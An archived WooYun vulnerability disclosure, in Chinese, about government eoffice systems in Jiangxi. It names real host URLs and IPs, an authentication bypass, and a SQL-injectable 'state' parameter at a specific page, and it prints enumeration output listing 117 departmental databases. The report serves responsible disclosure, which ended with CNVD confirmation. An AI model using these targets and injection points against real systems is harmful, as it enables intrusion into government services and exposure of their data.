乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-21: 细节已通知厂商并且等待厂商处理中 2015-01-26: 厂商已经确认,细节仅向厂商公开 2015-01-29: 细节向第三方安全合作伙伴开放 2015-03-22: 细节向核心白帽子及相关领域专家公开 2015-04-01: 细节向普通白帽子公开 2015-04-11: 细节向实习白帽子公开 2015-04-21: 细节向公众公开
你猜猜
案例:http://218.87.140.106/http://oa.jxgxedu.gov.cn/http://59.55.33.137:8010/http://59.55.33.137:8040/漏洞说明:打开后是个登录但可以直接访问mainpage/index.html
/mainpage/articleflashshow.aspx?flashtypeid=1&maxleng=7&state=1注入参数state
available databases [117]:[*] eoffice_2011_ayjyj[*] eoffice_2011_cygtgs[*] eoffice_2011_cyjyj[*] eoffice_2011_dnajj[*] eoffice_2011_dngxj[*] eoffice_2011_dngyy[*] eoffice_2011_dnhbj[*] eoffice_2011_dnjyj[*] eoffice_2011_dnsfj[*] eoffice_2011_dntjj[*] eoffice_2011_dnwsj[*] eoffice_2011_dnzx[*] eoffice_2011_dyjyj[*] eoffice_2011_gxgyy[*] eoffice_2011_gxwsj[*] eoffice_2011_gzshgyy[*] eoffice_2011_gzslyj[*] eoffice_2011_gzsyj[*] eoffice_2011_j123[*] eoffice_2011_jrgs[*] eoffice_2011_lngyy[*] eoffice_2011_lnjyj[*] eoffice_2011_nkjsw[*] eoffice_2011_qngxj[*] eoffice_2011_qnjyj2[*] eoffice_2011_rjgyy[*] eoffice_2011_scgyy[*] eoffice_2011_scjyj[*] eoffice_2011_sygyy[*] eoffice_2011_syjyj[*] eoffice_2011_sywsj[*] eoffice_2011_xfhbj[*] eoffice_2011_xyjt[*] eoffice_2012_aygtj[*] eoffice_2012_cyzfb[*] eoffice_2012_dngtj[*] eoffice_2012_dnjsw[*] eoffice_2012_dnyjj[*] eoffice_2012_dnytdzc[*] eoffice_2012_gzkejt[*] eoffice_2012_hcmzj[*] eoffice_2012_hcnxs[*] eoffice_2012_nksnxs[*] eoffice_2012_qnwsj[*] eoffice_2012_qnxwxcb[*] eoffice_2012_scxgyzx[*] eoffice_2012_scxrmyy[*] eoffice_2012_xfsyjj[*] eoffice_2012_xggyy[*] eoffice_2012_ydsyjj[*] eoffice_2012_yspt[*] eoffice_2013_cynxs[*] eoffice_2013_dnctgs[*] eoffice_2013_dnlyj[*] eoffice_2013_dnmzj[*] eoffice_2013_dnslj[*] eoffice_2013_dygyy[*] eoffice_2013_gzswsj[*] eoffice_2013_gzszxxz[*] eoffice_2013_hcnlj[*] eoffice_2013_hcwsj[*] eoffice_2013_lnhbj[*] eoffice_2013_ndjyj[*] eoffice_2013_ndxgdj[*] eoffice_2013_qnnbj[*] eoffice_2013_rjnxs[*] eoffice_2013_scjj[*] eoffice_2013_sldl[*] eoffice_2013_xfjyj[*] eoffice_2013_xyjzgs[*] eoffice_2014_ayfgj[*] eoffice_2014_ayjsw[*] eoffice_2014_ayjyj[*] eoffice_2014_ayngb[*] eoffice_2014_aynlj[*] eoffice_2014_aysbszf[*] eoffice_2014_ayzzb[*] eoffice_2014_dacl[*] eoffice_2014_dncyt[*] eoffice_2014_gzczgljl[*] eoffice_2014_gzsdwrmyy[*] eoffice_2014_gzsgxw[*] eoffice_2014_hcczj[*] eoffice_2014_hcfgw[*] eoffice_2014_hcgxj[*] eoffice_2014_hclyj[*] eoffice_2014_hcslga[*] eoffice_2014_hndc[*] eoffice_2014_lngxj[*] eoffice_2014_qnsfj[*] eoffice_2014_qnslj[*] eoffice_2014_syngb[*] eoffice_2014_synxs[*] eoffice_2014_syzzb[*] eoffice_2014_xfnxs[*] eoffice_2014_xfxzf[*] eoffice_2014_xgwsj[*] eoffice_2014_xlwy[*] eoffice_2014_ydlyj[*] eoffice_2015_ayybj[*] eoffice_2015_hcgyy[*] eoffice_2015_hclwzfdd[*] eoffice_2015_lngxz[*] eoffice_2015_xfkgj[*] eoffice_2015_xfswj[*] eoffice_2015_xfzfw[*] eoffice_Noa_WebUrlRewrite[*] eoffice_Sms_Manage[*] eoffice_standard_gzycjgxx[*] master[*] model[*] msdb[*] ocdc_xfxzf[*] OCDC_yspt[*] professional_gzndgyy[*] tempdb[*] test
过滤
危害等级:高
漏洞Rank:13
确认时间:2015-01-26 09:12
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给江西分中心,由江西分中心后续协调网站管理单位处置。
暂无